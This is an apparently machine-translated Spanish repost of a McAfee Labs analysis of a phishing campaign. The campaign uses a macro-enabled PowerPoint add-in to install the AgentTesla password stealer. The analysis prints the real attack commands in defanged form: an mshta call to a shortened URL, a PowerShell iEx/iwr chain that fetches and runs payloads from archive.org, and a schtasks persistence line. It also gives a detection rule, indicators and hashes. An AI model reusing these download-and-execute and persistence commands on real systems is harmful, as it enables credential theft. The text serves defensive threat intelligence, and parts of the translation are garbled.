Documentos maliciosos de PowerPoint en aumento


Escrito por Anuradha M

McAfee Labs ha observado una nueva campaña de phishing que utiliza las capacidades de macros disponibles en Microsoft PowerPoint. En esta campaña, el correo electrónico no deseado viene con un archivo de PowerPoint como archivo adjunto. Al abrir el archivo adjunto malicioso, la macro VBA se ejecuta para entregar variantes de AgentTesla, que es un conocido ladrón de contraseñas. Estos correos electrónicos no deseados pretenden estar relacionados con transacciones financieras.

AgentTesla es un malware RAT (troyano de acceso remoto) que tiene Ha estado activo desde 2014. Los atacantes usan esta RAT como MASS (Malware-As-A-Service) para robar credenciales de usuario y otra información de las víctimas a través de capturas de pantalla, keylogging y capturas de portapapeles. Su modus operandi se basa principalmente en campañas de phishing.

Durante el segundo trimestre de 2021, hemos visto un aumento en el malware de PowerPoint.

Figura 1. Tendencia del malware PPT durante la primera mitad de 2021
Figura 1. Tendencia del malware PPT durante la primera mitad de 2021

En esto Campaña, los Correo basura contiene un adjuntared archivar con a .ppam extensión que es un PowerPoint expediente conteniendo VBA código. los sentimiento usó era relacionado con las finanzas temas tal como: «Nuevo pedido de PO300093« como se muestra en la Figura 2. El nombre del archivo adjunto es «300093.pagdf.ppam”.

Figura 2. Correo electrónico no deseado

Archivo PPAM:

Este tipo de archivo se introdujo en 2007 con el lanzamiento de Microsoft Office 2007. Es un archivo de complemento Open XML habilitado para macros de PowerPoint. Contiene componentes que agregan funcionalidad adicional, incluidos comandos adicionales, macros personalizadas y nuevas herramientas para extender las funciones predeterminadas de PowerPoint.

Dado que PowerPoint admite ‘complementos’ desarrollados por terceros para agregar nuevas funciones, los atacantes abusan de esta función para ejecutar macros automáticamente.

Análisis técnico:

Una vez que la víctima abre el«.Ppam» , una ventana emergente de advertencia de aviso de seguridad como se muestra en la Figura 3 para alertar al usuario sobre la presencia de macro.

Figura 3. Advertencia al abrir el archivo de PowerPoint adjunto
Figura 3. Advertencia al abrir el archivo de PowerPoint adjunto

De Figura 4, puedes ver que the Función de complemento de El PowerPoint se puede identificar a partir de la contenido de[Content_Types]archivo .xml que ser presente dentro del ppam expediente.

Figura 4. Función complementaria de Powerpoint con macroEnabled
Figura 4. Función complementaria de Powerpoint con macroEnabled

El archivo PPAM contiene los siguientes archivos y directorios que se pueden ver en la extracción.

  • _rels .rels
  • [Content_Types].xml
  • ppt rels presentation.xml.rels
  • ppt asjdaaasdasdsdaasdsdasasdasddoasddasasddasasdsasdjasddasdoasjdasasddoajsdjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.bin – archivo malicioso
  • ppt presentación.xml

Una vez que la víctima habilita la macro, el complemento se instala silenciosamente sin el conocimiento del usuario, lo cual se puede ver en la Figura 5. Al ver que no hay contenido ni diapositiva en el PowerPoint, el usuario cerrará el archivo pero, en el backend, el código macro se ejecuta para iniciar la actividad maliciosa.

Figura 5. Complementos instalados en las opciones de PowerPoint
Figura 5. Complementos instalados en las opciones de PowerPoint

Como puede ver en la Figura 6, la macro se ejecuta dentro de los complemento auto_abierto() evento es decir., macro es despedido inmediatamente después de que se abra la presentación y se carga el complemento.

Figura 6: fragmento de código VBA con evento auto_open ()
Figura 6: fragmento de código VBA con evento auto_open ()

El código de macro de PowerPoint en ejecución lanza una URL invocando mshta.exe (Aplicación HTML de Microsoft) que se muestra en la Figura 7. El proceso mshta es lanzado por Powerpoint llamando alCreateProcessA () API.

A continuación se muestran los parámetros pasados ​​a la API CreateProcessA ():

kernel32.CreateProcessA (00000000, mshta hxxps: //www.bitly.com/asdhodwkodwkidwowdiahsidh, 00000000,00000000,00000001,00000020,00000000,00000000, D,

Figura 7. Fragmento de código VBA que contiene mshta y url
Figura 7. Fragmento de código VBA que contiene mshta y url

A continuación se muestra el parámetro de línea de comando de mshta:

mshta hxxps: //www.bitly.com/asdhodwkodwkidwowdiahsidh

La URL hxxps: //www.bitly.com/asdhodwkodwkidwowdiahsidh es redirigido a «Hxxps: // p8hj[.]blogspot[.]com / p / 27.html ” pero no obtuvo ninguna respuesta de «27.html» en el momento del análisis.

Más tarde, mshta.exe genera powershell.exe como un proceso secundario.

A continuación se muestran los parámetros de la línea de comandos de PowerShell:

powershell.exe – «C: Windows System32 WindowsPowerShell v1.0 powershell.exe ”i’E’x (iwr (‘hxxps: //ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt‘) -useB); i’E’x (iwr (‘hxxps: //ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-2.txt‘) -useB); i’E’x (iwr (‘hxxps: //ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-3.txt‘) -useB);

PowerShell descarga y ejecuta archivos de script de los mencionados anteriormente. URLs.

La siguiente Figura 8 muestra el contenido de la primera URL: «hxxps: //ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt ”:

Figura 8. Contenido del archivo binario
Figura 8. Contenido del archivo binario

Hay dos archivos binarios almacenados en dos matrices enormes dentro de cada archivo de PowerShell descargado. El primer archivo es un archivo EXE que actúa como cargador y el segundo archivo es un archivo DLL, que es una variante de AgentTesla. PowerShell obtiene la carga útil de AgentTesla de las URL mencionadas en la línea de comandos, la decodifica y se inicia MSBuild.exe para inyectar la carga útil dentro de sí mismo.

Programar tareas:

Para lograr la persistencia, crea una tarea programada en «Programador de tareas» y suelta un archivo de tareas debajo C: windows system32 SECOTAKSA para que toda la campaña funcione de manera eficaz.

Figura 9. Fragmento de código para crear una nueva tarea de programación
Figura 9. Fragmento de código para crear una nueva tarea programada

El nuevo nombre de la tarea es «SECOTAKSA”. Su acción es ejecutar el comando «mshta hxxp: // //1230948%1230948@0v2x.blogspot.com/p/27.html ” y se llama cada 80 minutos.

A continuación se muestran los parámetros de la línea de comando de schtasks:

schtasks.exe –“C: Windows System32 schtasks.exe” / create / sc MINUTE / mo 80 / tn “” SECOTAKSA ”” / F / tr “” ”” MsHtA ”” ””hxxp: //1230948%1230948@0v2x.blogspot.com/p/27.html «»

Cadena de infección:

Figura 10. Cadena de infección
Figura 10. Cadena de infección

Proceso Árbol:

Figura 11. Árbol de procesos
Figura 11. Árbol de procesos

Mitigación:

Los productos Endpoint Security (ENS) y Windows Systems Security (WSS) de McAfee han CUALES cobertura para esta variante de malware.

Este documento PPAM malicioso con SHA256: fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182 se detecta como «W97M / Descargador.dkw”.

El documento PPAM también está bloqueado por el Característica AMSI en ENS como AMSI-FKN!

Además, el Prevención de exploits La característica del producto Endpoint Security de McAfee bloquea la cadena de infección de este malware al agregar la siguiente regla experta para proteger a nuestros clientes de este ataque malicioso.

Regla experta creada en base a la siguiente cadena de infección:

POWERPNT.EXE -> mshta.exe

Regla de experto:

Regla

Proceso

Incluya OBJECT_NAME -v «powerpnt.exe»

Objetivo

Coincidir con PROCESO

Incluya OBJECT_NAME -v «mshta.exe»

Incluya PROCESS_CMD_LINE -v “** http **”

Incluir -acceso «CREAR»

IOC

URL:

hxxps: //www.bitly.com/asdhodwkodwkidwowdiahsidh

hxxp: // //1230948%1230948@0v2x.blogspot.com/p/27.html

hxxps: // p8hj[.]blogspot[.]com / p / 27.html

hxxps: //ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt

hxxps: //ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-2.txt

hxxps: //ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-3.txt

Archivos EML:

72e9110652ad2eb992c955382d8ad61020c0e527b1595619f9c48bf66cc7d15d3

0afd443dedda44cdd7bd4b91341bd87ab1be8d3911d0f1554f45bd7935d3a8d0

fd887fc4787178a97b39753896c556fff9291b6d8c859cdd75027d3611292253

38188d5876e17ea620bbc9a30a24a533515c8c2ea44de23261558bb4cad0f8cb

Archivos PPAM:

fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182

6c45bd6b729d85565948d4f4deb87c8668dcf2b26e3d995ebc1dae1c237b67c3

9df84ffcf27d5dea1c5178d03a2aa9c3fb829351e56aab9a062f03dbf23ed19b

ad9eeff86d7e596168d86e3189d87e63bbb8f56c85bc9d685f154100056593bd

c22313f7e12791be0e5f62e40724ed0d75352ada3227c4ae03a62d6d4a0efe2d

Archivos AgentTesla extraídos:

71b878adf78da89dd9aa5a14592a5e5da50fcbfbc646f1131800d02f8d2d3e99

90674a2a4c31a65afc7dc986bae5da45342e2d6a20159c01587a8e0494c87371





Enlace a la noticia original